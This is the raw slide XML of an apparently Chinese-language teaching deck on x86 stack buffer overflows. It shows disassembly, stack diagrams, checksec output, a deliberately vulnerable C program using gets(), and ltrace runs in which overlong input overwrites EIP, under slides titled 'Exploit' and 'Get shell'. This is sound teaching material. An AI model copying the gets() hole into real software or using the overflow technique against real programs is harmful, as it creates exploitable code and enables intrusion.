              <a:ext cx="223967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0x80483fd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="621" name="0xf8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3484142" y="6051216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0xf8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="622" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687627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623" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687627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624" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215078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6" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892767" y="72999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0xf0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="627" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3547654" y="85877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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="628" name="0x1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3547654" y="77495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0x1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="629" name="0x98"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5884146" y="2293864"/>
              <a:ext cx="109555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0x98</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="630" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="8976319"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="631" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="92950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33" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483dc: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret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X86 Function Call"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="7792602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X86 Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="636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0xf8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0xf0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0x80483fd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663" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15041751" y="3709710"/>
            <a:ext cx="6979706" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6979704" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="637" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215078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8" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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9" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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0" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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1" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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2" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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3" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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5" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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6" name="stack"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3382678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647" name="Low"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892767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648" name="High"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892779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649" name="0x80483fd"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2848460" y="6911378"/>
              <a:ext cx="223967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0x80483fd</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="650" name="0xf8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3484142" y="6051216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0xf8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="651" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687627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652" name="…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3687627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653" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2150789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4" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="215078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5" name="0xf0"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892767" y="72999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0xf0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="656" name="0x2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3547654" y="85877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0x2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="657" name="0x1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3547654" y="77495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0x1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="658" name="0x98"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5884146" y="2293864"/>
              <a:ext cx="109555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0x98</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="659" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="8976319"/>
              <a:ext cx="99398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 </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="660" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="92950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1" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12" y="72999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662" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="948591" y="7682189"/>
              <a:ext cx="1078458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665" name="080483db &lt;f&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="11101609" cy="954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080483db &lt;f&gt;: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80483dc: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80483de:	83 ec 50             	sub    $0x50,%esp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80483e1:	8b 55 08             	mov    0x8(%ebp),%edx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80483ef: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80483f0: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080483f1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80483f4:	6a 02                	push   $0x2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF26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80483f6:	6a 01                	push   $0x1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80483f8:	e8 de ff ff ff       	call   80483db &lt;f&gt;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80483fd:	83 c4 08             	add    $0x8,%esp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8048406:	c3                   	ret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Exploit"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10029832" y="6075679"/>
            <a:ext cx="4311636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Exploit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Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="56482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0" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3175" y="7161067"/>
            <a:ext cx="24377650" cy="65559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1" name="分析程式執行過程…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7634858" y="8691525"/>
            <a:ext cx="9101584" cy="349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分析程式執行過程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="0433FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>詳列libc函數執行參數等資訊</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360947" indent="-360947">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>用-i參數查看執行eip，當溢位時</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  可以快速定位出溢出點。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Rectangle 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10764000" y="7501190"/>
            <a:ext cx="2843299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72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ltrace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="673" name="Screen Shot 2019-04-12 at 4.17.44 PM.png" descr="Screen Shot 2019-04-12 at 4.17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335" y="2489200"/>
            <a:ext cx="22216630" cy="2589488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3905250" y="2971800"/>
            <a:ext cx="2224485" cy="1082040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="635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5" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6496050" y="3556000"/>
            <a:ext cx="10132120" cy="455888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="0433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Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="56482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78" name="Picture Placeholder 3" descr="Picture Placeholder 3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9" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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0" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15702982" y="4249784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Get shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="root@Ubuntu : tmp ➤ checksec easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282374" y="1078229"/>
            <a:ext cx="9577423" cy="1128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checksec easy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  <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="4324D4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t>] ‘/tmp/easy’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Arch:     i386-32-little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RELRO:    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="969600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partial RELRO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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Stack:    </a:t>
            </a:r>
            <a:r>
              <a:t>No canary found</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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NX:       </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="B12513"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NX disabled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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    PIE:      </a:t>
            </a:r>
            <a:r>
              <a:t>No PIE (0x8048000)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    RWX:      </a:t>
            </a:r>
            <a:r>
              <a:t>Has RWX segments</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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cat easy.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="669900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90055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="0077AA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr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>
                <a:solidFill>
                  <a:srgbClr val="0077AA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DD4A68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vul</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr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char</a:t>
            </a:r>
            <a:r>
              <a:t> buf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="990055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr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D4A68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="0077AA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0055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0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defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="9999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defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="DD4A68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77AA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t>main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0077AA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr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D4A68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vul</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="0077AA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0055"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0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defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="9999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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="56482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4" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3175" y="7161067"/>
            <a:ext cx="24377650" cy="65559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5" name="root@Ubuntu : tmp ➤ python -c &quot;print 'a'&quot;|ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113850" y="2005594"/>
            <a:ext cx="22143601" cy="418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python -c "print 'a'"|ltrace -if ./easy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6223] [0x8048331] __libc_start_main(0x8048427, 1, 0xffc5f654, 0x8048450 &lt;unfinished ...&gt;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6223] [0x804841d] gets(0xffc5f58f, 0xf774b000, 0xf7749244, 0xf75b10ec)                                = 0xffc5f58f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6223] [0xffffffffffffffff] +++ exited (status 0) +++</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="程式正常結束！"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8930005" y="6174104"/>
            <a:ext cx="6511291" cy="1367791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumOff val="-10627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程式正常結束！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9016524" y="8748675"/>
            <a:ext cx="6338253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2600"/>
              </a:buClr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找出溢出點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Get shell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Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="56482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0" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3175" y="7161067"/>
            <a:ext cx="24377650" cy="65559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1" name="root@Ubuntu : tmp ➤ python -c &quot;print 'a'*20&quot;|ltrace -if ./easy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113850" y="2005594"/>
            <a:ext cx="22143601" cy="476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python -c "print 'a'*</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:t>"|ltrace -if ./easy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6226] [0x8048331] __libc_start_main(0x8048427, 1, 0xffbd5634, 0x8048450 &lt;unfinished ...&gt;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6226] [0x804841d] gets(0xffbd556f, 0xf7711000, 0xf770f244, 0xf75770ec)                                = 0xffbd556f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6226] [</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x61616161</a:t>
            </a:r>
            <a:r>
              <a:t>] --- SIGSEGV (Segmentation fault) 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6226] [0xffffffffffffffff] +++ killed by SIGSEGV +++</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="EIP被修改為0x61616161！"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590427" y="6174104"/>
            <a:ext cx="11190447" cy="1367791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumOff val="-10627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EIP被修改為0x61616161！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="練習(no ASLR, no NX)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9016524" y="8748675"/>
            <a:ext cx="6338253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2600"/>
              </a:buClr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找出溢出點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Get shell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e99e6b5e-ca6c-4c19-87b7-dfd63db6381a_m.jpg" descr="e99e6b5e-ca6c-4c19-87b7-dfd63db6381a_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6650" y="2730500"/>
            <a:ext cx="11938000" cy="825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ELF"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10909779" y="6075679"/>
            <a:ext cx="2485391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pic>
        <p:nvPicPr>
          <p:cNvPr id="698" name="Screen Shot 2019-04-13 at 9.30.11 PM.png" descr="Screen Shot 2019-04-13 at 9.30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6057" y="5473730"/>
            <a:ext cx="7999186" cy="5784027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699" name="EIP被修改為0x61616161…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="7411493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EIP被修改為0x61616161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What happen??????</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700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703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704" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="728" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15033130" y="3709710"/>
            <a:ext cx="6996948" cy="9613861"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6996947" cy="9613859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="705" name="rutern address"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2438192" y="6911378"/>
              <a:ext cx="305205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rutern address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="706" name="prev ebp point"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2476007" y="6073178"/>
              <a:ext cx="300182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prev ebp point</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="707" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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08" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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09" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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10" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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11" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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12" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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13" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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14" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2159410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15" name="Rectangle"/>
